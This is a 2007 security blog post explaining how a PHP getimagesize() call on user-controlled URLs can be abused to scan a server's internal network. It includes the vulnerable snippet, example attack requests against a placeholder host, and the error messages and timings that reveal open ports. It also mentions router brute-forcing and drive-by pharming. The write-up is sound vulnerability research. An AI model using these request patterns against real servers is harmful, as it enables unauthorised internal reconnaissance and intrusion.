THP Wisec USH DigitalBullets TheHackersPlace network
The WIse SECurity
.italian
.english
Wisec Home SecSearch Projects Papers Security Thoughts
 
News
Flash Application Testing: A New Vector for XSS and Cross Site Flashing.
IE and Firefox Digest Authentication Request Splitting.
Php import_req_var globals overwrite Advisory.
Subverting Ajax - The Paper.
Adobe Plugin Multiple Vulnerabilities.
Wisec@23rd.CCC Congress in Berlin - 29th Dec. 2006 - Subverting Ajax.
SecSearch. Search Engine for Security Community.
Mysql COM_TABLE_DUMP Flaws.
Mysql Anonymous login Flaw.
A new project to stop embed passwords in Php scripts: PassBroker.
MySQL new three vulnerabilities unleashed
PHP shmop safemode bypass
PHP RFC1867 Vuln - POC Released!
Search on Wisec
Google

Security Thoughts

[ Back ]

Wednesday, August 29, 2007, 17:24

Scanning internal Lan with PHP remote file opening.

Even if some website is still vulnerable to remote file inclusion (RFI), this is becoming a quite rare scenery.
Nonetheless, much more often it happens that some of the php functions allowing http or ftp protocol wrappers are exposed to user control.
A perfect example for this tecnique is a fully controlled getsizeimage() function with allow_url_fopen.
No RFI, no data returned, it could be just used for DoS.

<?
getimagesize($_GET['image']);
...
?>


Obviously there's no RFI, and until yesterday probably nobody would care about check,inspect or exploit it. This article explains that some kind of attack could still be accomplished:

Lan scanning and Drive by Pharming with error matching or time analisys.

If the php error display is set to On, a simple request like:

http://victim.ltd/flawed.php?image=http://127.0.0.1:22/check

will display:

Warning: getimagesize(http://127.0.0.1:22/check): failed to open stream:
Connection refused in...

This means it's a closed port.


Indeed, an open port will be displayed as:

Warning: getimagesize(http://127.0.0.1:22): failed to open stream:
HTTP request failed!...

ftp :// protocol could obviously be used, too.

If there's no error on output, timing attacks could be accomplished too.

Infact we could get timing result if a port is closed:
http://victim.ltd/flawed.php?image=ftp://127.0.0.1:3306/check

real 0m0.057s
user 0m0.032s
sys 0m0.020s

Or if a port is opened :
http://victim.ltd/flawed.php?image=ftp://127.0.0.1:3306/check

real 0m5.095s
user 0m0.032s
sys 0m0.020s


----
So, what can be done?

If the right conditions are satisfied:
1. Drive By Pharming
2. Bruteforcing routers.
3. Full Lan Scan.

Last, Ascii wrote a nice php script for Lan Scan.
You can find it here...

Ah... did I mentioned that php remote file supports HTTP Basic Authentication? :)

As usual, the next move is up to you

Comments:

No comments yet.

 
Comments are disabled

Admin login | This weblog is from www.mylittlehomepage.net

Wisec is brought to you by...

Wisec is written and mantained by Stefano Di Paola.

Wisec uses open standards, including XHTML, CSS2, and XML-RPC.

All Rights Reserved 2004
All hosted messages and metadata are owned by their respective authors.